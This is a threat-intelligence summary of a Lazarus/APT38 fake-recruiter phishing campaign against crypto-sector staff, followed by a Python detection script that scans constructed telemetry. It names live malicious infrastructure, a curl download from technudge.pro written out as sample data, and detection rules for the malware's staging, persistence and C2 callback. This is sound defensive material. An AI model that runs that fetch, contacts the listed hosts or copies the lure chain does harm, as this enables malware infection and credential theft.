Lazarus Group (APT38) Targets Crypto Sector with Sophisticated Phishing Campaign
2025-08-28 • KuCoin
KuCoin attributes a recent wave of fake-recruiter phishing against cryptocurrency-sector personnel to Lazarus Group/APT38, with lures delivered over LinkedIn, Telegram, and X. Non-technical targets are pushed through a fake interview site that reports a missing camera driver and instructs them to run macOS or Windows commands that download payloads from technudge[.]pro. The macOS chain stages files under /var/tmp/CDrivers, launches cloud.sh, opens a fake ChAudioFixer app, and installs a LaunchAgent for persistence; the Windows chain expands cdrivWin.zip and runs update.vbs through wscript.exe. The Windows package includes Python-based components such as nvidia.py, auto.py, api.py, and command.py that steal cookies, saved passwords, and crypto-wallet data, communicate over an encrypted channel to 38.146.28[.]177:8080, and provide remote-control functions. Technical targets are instead steered toward malicious repositories, npm packages such as matrix-charts and rtklog, and a GitLab clone flow that the article says abuses CVE-2025-48384.
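As an added defender-side example (not code from the KuCoin report), the script below turns the chain described above into a few narrow detection rules (the /var/tmp/CDrivers staging, the LaunchAgent persistence, wscript.exe running update.vbs, the 38.146.28.177:8080 callback, and downloads from technudge.pro) and runs them over constructed newline-delimited JSON endpoint telemetry; the event schema, host names, plist label, and LaunchAgent target are assumptions.

```python
import json

# Constructed sample telemetry (not from the report): one JSON event per line.
# Field names (type, image, cmdline, path, program, dst_ip, dst_port) are an assumed schema;
# the plist label and the LaunchAgent target are likewise assumed, not reported values.
SAMPLE_EVENTS = r"""
{"id": 1, "host": "mac-01", "type": "process", "image": "/bin/bash", "cmdline": "bash /var/tmp/CDrivers/cloud.sh"}
{"id": 2, "host": "mac-01", "type": "file", "path": "/Users/dev/Library/LaunchAgents/com.example.cdrivers.plist", "program": "/var/tmp/CDrivers/cloud.sh"}
{"id": 3, "host": "win-07", "type": "process", "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\cdrivWin\\update.vbs"}
{"id": 4, "host": "win-07", "type": "network", "dst_ip": "38.146.28.177", "dst_port": 8080}
{"id": 5, "host": "mac-02", "type": "process", "image": "/usr/bin/curl", "cmdline": "curl -fsSL https://technudge.pro"}
{"id": 6, "host": "win-08", "type": "process", "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe C:\\scripts\\backup.vbs"}
{"id": 7, "host": "win-08", "type": "network", "dst_ip": "203.0.113.10", "dst_port": 443}
"""

# Each rule is (name, predicate). Indicator values come from the reported chain; matching is
# deliberately narrow so ordinary wscript.exe and outbound HTTPS activity (events 6, 7) stays quiet.
RULES = [
    ("macos_cdrivers_staging", lambda e: e["type"] == "process"
        and "/var/tmp/CDrivers" in e.get("cmdline", "")),
    ("macos_launchagent_persistence", lambda e: e["type"] == "file"
        and "/Library/LaunchAgents/" in e.get("path", "")
        and e.get("program", "").startswith("/var/tmp/CDrivers")),
    ("windows_wscript_update_vbs", lambda e: e["type"] == "process"
        and e.get("image", "").lower().endswith("wscript.exe")
        and "update.vbs" in e.get("cmdline", "").lower()),
    ("c2_callback_38_146_28_177_8080", lambda e: e["type"] == "network"
        and e.get("dst_ip") == "38.146.28.177" and e.get("dst_port") == 8080),
    ("download_from_technudge_pro", lambda e: e["type"] == "process"
        and "technudge.pro" in e.get("cmdline", "").lower()),
]


def scan_events(ndjson: str):
    """Run every rule over newline-delimited JSON events; return sorted (id, host, rule) hits."""
    hits = []
    for line in ndjson.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits.extend((event["id"], event["host"], name) for name, match in RULES if match(event))
    return sorted(hits)


def hosts_to_isolate(ndjson: str):
    """Hosts with at least one hit: candidates for containment and fuller forensic review."""
    return sorted({host for _, host, _ in scan_events(ndjson)})
```

Wire the rules to real process, file and network telemetry by mapping your EDR's field names onto the assumed schema; the predicates themselves need no change.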
Indicators of Compromise